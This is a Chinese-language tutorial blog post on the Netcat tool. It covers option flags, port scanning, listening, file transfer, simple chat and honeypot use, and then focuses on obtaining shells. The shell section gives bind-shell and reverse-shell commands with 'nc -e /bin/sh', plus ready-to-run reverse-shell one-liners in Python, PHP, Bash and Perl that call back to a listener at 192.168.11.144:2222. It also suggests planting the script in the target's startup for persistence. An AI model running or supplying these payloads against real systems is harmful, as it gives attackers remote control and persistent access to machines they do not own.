目录
前言
1 Netcat简介
2 Netcat选项参数说明
3 Netcat简易使用
3.1 连接到远程主机
3.2 监听本地主机
3.3 端口扫描
3.4 端口监听
3.5 连接远程系统
3.6 FTP匿名探测
3.7 文件传输
3.8 简易聊天
3.9 蜜罐
3.10 获取shell
3.10.1 正向shell
3.10.2 反向shell
3.10.3 特殊情况——目标主机上没有Netcat,如何获取反向shell(重要)
python反向shell
PHP反向shell
Bash反向shell
Perl反向shell
最近在做渗透测试的时候遇到了端口监听和shell的反弹问题,在这个过程中自己对Netcat这一款神器有了新的认识,现将一些Netcat的用法做一个小总结,希望对各位有帮助!
Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。总之功能强大,可以用一句较为风趣的话来描述NC的强大——“你的想象力是局限NC的瓶颈”。
功能说明:端口扫描、端口监听、远程文件传输、远程shell等等;
语 法:nc [-hlnruz] [-g<网关...>] [-G<指向器数目>] [-i<延迟秒数>] [-o<输出文件>] [-p<通信端口>] [-s<来源位址>] [-v...] [-w<超时秒数>] [主机名称] [通信端口...]
参 数:
-g <网关> 设置路由器跃程通信网关,最多可设置8个;
-G <指向器数目> 设置来源路由指向器,其数值为4的倍数;
-h 在线帮助;
-i <延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口;
-l 使用监听模式,管控传入的资料;
-n 直接使用IP地址,而不通过域名服务器;
-o <输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;
-p <通信端口> 设置本地主机使用的通信端口;
-r 乱数指定本地与远端主机的通信端口;
-s <来源位址> 设置本地主机送出数据包的IP地址;
-u 使用UDP传输协议;
-v 显示指令执行过程;
-w <超时秒数> 设置等待连线的时间;
-z 使用0输入/输出模式,只在扫描通信端口时使用。(TCP)
命令:nc -nv Targert_IP Targert_Port
命令:nc -l -p Local_Port
扫描指定主机的单一端口是否开放
格式:nc -v target_IP target_Port
扫描指定主机的某个端口段的端口开放信息
z 参数(TCP)翻译过来就是不进行 i/o,用来扫描。意思就是仅仅是去 ping 去探测目标是否开启指定端口,不进行任何的交互。
z 参数默认扫描的是 tcp 类型,如果需要扫描 udp,则需要使用一个新参数 u。
格式:nc -v -z Target_IP Target_Port_Start - Target_Port_End
扫描指定主机的某个UDP端口段,并且返回端口信息
格式:nc -v -z -u Target_IP Target_Port_Start - Target_Port_End
扫描指定主机的端口段信息,并且设置超时时间为3秒
格式:nc -vv(-v) -z -w time Target_IP Target_Port_Start-Targert_Port_End
监听本地端口
格式:nc -l -p local_Port
注:先设置监听(不能出现端口冲突),之后如果有外来访问则输出该详细信息到命令行
监听本地端口,并且将监听到的信息保存到指定的文件中
格式:nc -l -p local_Port > target_File
格式:nc Target_IP Target_Port
之后可以运行HTTP请求
格式:nc Targert_IP 21
传输端:
格式:nc Targert_IP Targert_Port < Targert_File
接收端:
格式:nc -l Local_Port > Targert_File
本地主机
命令:nc -l 8888
远程主机
命令:nc Targert_IP Targert_Port
作为蜜罐使用1:
命令:nc -L -p Port
注:使用“-L”参数可以不停的监听某一个端口,知道Ctrl+C为止
作为蜜罐使用2:
命令:nc -L -p Port >log.txt
注:使用“-L”参数可以不停的监听某一个端口,知道Ctrl+C为止,同时把结果输出到log.txt文件中,如果把“>”改为“>>”即追加到文件之后。
这一个命令参数“-L”在Windows中有,现在的Linux中是没有这个选项的,但是自己可以去找找,这里只是想到了之前的这个使用,所以提出来简单介绍一下!
简述:获取shell分为两种,一种是正向shell,一种是反向shell。
注意:正向和反向目的都是为了攻击机获取目标的shell
正向shell:攻击机(A)连接服务器(B),B开放特定端口,B将shell绑定到B的特定端口,A直接用NC连接B。
反向shell:攻击机A)连接服务器(B),A开放特定端口,B反向连接A的特定端口,并将shell发回给A。
通常情况下,一般的服务器都会有防火墙,很少会允许其他外在的机器来连接自己的某一个端口,只有某些指定端口可能会允许访问,例如 web 服务的 80 端口。这时正向的 shell 就不起作用了,而防火墙一般都会禁止外在机器来连接自己机器的其他端口,但自己的机器访问外面的端口一般不会做限制,这时候就可以使用反向 shell,也就是攻击者指定一个端口和 bash,让目标服务器来连接自己,这样就可以写一个脚本放到目标服务器的开机启动中,只要目标服务器运行就会连接自己。
在该图中,目标使用Netcat侦听器将Bash shell绑定到它特定端口4444。攻击者使用简单的Netcat命令连接到此端口。
设置bind shell的步骤如下:使用Netcat将一个bash shell绑定到4444端口。 从攻击主机连接到端口4444上的目标主机。 从攻击主机发出命令到目标主机上。
本地主机(客户端):
命令:nc Targert_IP Targert_Port
在客户端执行服务器的命令
目标主机(服务器):
命令:nc -lvp Targert_Port -e /bin/sh
在此示例中,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用Netcat发出命令启动反向shell。
本地主机(客户端):
命令: nc -lvp Target_Port
目标主机(服务器):
命令: nc Targert_IP Targert_Port -e /bin/sh
在一般情况下,目标主机上一般都是不会有Netcat的,此时就需要使用其他替代的方法来实现反向连接达到攻击主机的目的,下面简单的介绍几种反向shell的设置。
目标主机端执行语句:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.144",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
本地主机
目标主机
目标主机端执行语句:
php -r '$sock=fsockopen("192.168.11.144",2222);exec("/bin/sh -i <&3 >&3 2>&3");'
本地主机:
目标主机:
目标主机端执行语句:
bash -i>&/dev/tcp/192.168.11.144/2222 0>&1
本地主机:
目标主机:
目标主机端执行语句:
perl -e 'use Socket;$i="192.168.11.144";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
本地主机
目标主机
注:书写的时候一定要注意这里单引号、双引号是英文格式的,不然会报错误!
总结:有一句话为“温故而知新”,同时又有一句话为“实践出真知”,当这两句话同时践行的时候,就会擦出不一样的火花,你会看到你之前未见到的,掌握到你之前生疏的技能!Netcat固然好用,但是也要经过实践才知道,那你还在等什么呢?